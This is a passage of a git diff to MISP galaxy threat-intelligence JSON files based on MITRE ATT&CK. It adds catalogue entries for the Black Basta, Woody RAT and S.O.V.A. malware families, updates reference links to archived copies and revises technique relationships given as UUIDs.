+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "56e0d8b8-3e25-49dd-9050-3aa252f5aa92",
"tags": [
@@ -31754,5 +31343,5 @@
"value": "TeamTNT - G0139"
}
],
- "version": 30
+ "version": 31
}
diff --git a/clusters/mitre-malware.json b/clusters/mitre-malware.json
index 802bca1..523ed4a 100644
--- a/clusters/mitre-malware.json
+++ b/clusters/mitre-malware.json
@@ -35,13 +35,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "4b62ab58-c23b-4704-9c15-edd568cd59f8",
@@ -429,12 +422,12 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"https://401trg.github.io/pages/burning-umbrella.html",
"https://attack.mitre.org/software/S0141",
"https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/",
"https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
- "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "https://securelist.com/winnti-more-than-just-a-game/37029/",
+ "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
],
"synonyms": [
"Winnti for Windows"
@@ -931,6 +924,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"tags": [
@@ -1121,9 +1121,9 @@
"macOS"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0032",
"https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/",
"https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html"
],
@@ -1314,7 +1314,7 @@
"value": "gh0st RAT - S0032"
},
{
- "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)",
+ "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)",
"meta": {
"external_id": "S0020",
"mitre_platforms": [
@@ -1325,6 +1325,7 @@
"https://us-cert.cisa.gov/ncas/alerts/aa21-200a",
"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/",
"https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
],
"synonyms": [
@@ -1538,6 +1539,192 @@
"uuid": "ab3580c8-8435-4117-aace-3d9fbe46aa56",
"value": "Unknown Logger - S0130"
},
+ {
+ "description": "[Black Basta](https://attack.mitre.org/software/S1070) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://attack.mitre.org/software/S1070) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://attack.mitre.org/software/S1070) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://attack.mitre.org/software/S1070) RaaS operators could include current or former members of the [Conti](https://attack.mitre.org/software/S0575) group.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Cyble Black Basta May 2022)",
+ "meta": {
+ "external_id": "S1070",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1070",
+ "https://blog.cyble.com/2022/05/06/black-basta-ransomware/",
+ "https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
+ "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
+ "https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence"
+ ],
+ "synonyms": [
+ "Black Basta"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "28170e17-8384-415c-8486-2e6b294cb803",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "8d242fb4-9033-4f13-8a88-4b9b4bcd9a53",
+ "value": "Black Basta - S1070"
+ },
{
"description": "[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)",
"meta": {
@@ -1715,6 +1902,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -3357,13 +3551,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -3836,13 +4023,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b",
"tags": [
@@ -4176,6 +4356,229 @@
"uuid": "54895630-efd2-4608-9c24-319de972a9eb",
"value": "Ragnar Locker - S0481"
},
+ {
+ "description": " [Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)",
+ "meta": {
+ "external_id": "S1065",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1065",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild"
+ ],
+ "synonyms": [
+ "Woody RAT"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "3bc7e862-5610-4c02-9c48-15b2e2dc1ddb",
+ "value": "Woody RAT - S1065"
+ },
{
"description": "[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)",
"meta": {
@@ -5582,13 +5985,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -6418,13 +6814,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "e1161124-f22e-487f-9d5f-ed8efc8dcd61",
@@ -6516,13 +6905,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
"tags": [
@@ -6551,6 +6933,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d2c4e5ea-dbdf-4113-805a-b1e2a337fb33",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -6923,6 +7312,160 @@
"uuid": "3161d76a-e2b2-4b97-9906-24909b735386",
"value": "Aria-body - S0456"
},
+ {
+ "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for \"owl\", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)",
+ "meta": {
+ "external_id": "S1062",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1062",
+ "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly",
+ "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html"
+ ],
+ "synonyms": [
+ "S.O.V.A."
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "08e22979-d320-48ed-8711-e7bf94aabb13",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0cdd66ad-26ac-4338-a764-4972a1e17ee3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "51636761-2e35-44bf-9e56-e337adf97174",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "73c26732-6422-4081-8b63-6d0ae93d449e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "74e6003f-c7f4-4047-983b-708cc19b96b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1c95426-2550-4621-8028-ceebf28b3a47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1f1337e-aea7-454c-86bd-482a98ffaf62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dc01774a-d1c1-45fb-b506-0a5d1d6593d9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "4b53eb01-57d7-47b4-b078-22766b002b36",
+ "value": "S.O.V.A. - S1062"
+ },
{
"description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)",
"meta": {
@@ -7131,13 +7674,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "c5e9cb46-aced-466c-85ea-7db5572ad9ec",
@@ -8279,13 +8815,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517",
@@ -8463,13 +8992,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4",
@@ -9109,8 +9631,8 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0009",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"
],
"synonyms": [
@@ -9529,9 +10051,9 @@
"Linux"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0021",
"https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
"https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
],
@@ -9680,13 +10202,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "94379dec-5c87-49db-b36e-66abc0b81344",
@@ -9860,9 +10375,9 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0012",
"https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf",
"https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign",
"https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99"
@@ -9973,13 +10488,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -10434,8 +10942,8 @@
"http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
"http://labs.lastline.com/an-analysis-of-plugx",
"http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/",
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0013",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
"https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
],
@@ -10576,13 +11084,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -10660,13 +11161,6 @@
],
"type": "similar"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
"tags": [
@@ -11477,6 +11971,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65",
"tags": [
@@ -11881,6 +12382,271 @@
"uuid": "40a1b8ec-7295-416c-a6b1-68181d86f120",
"value": "Hildegard - S0601"
},
+ {
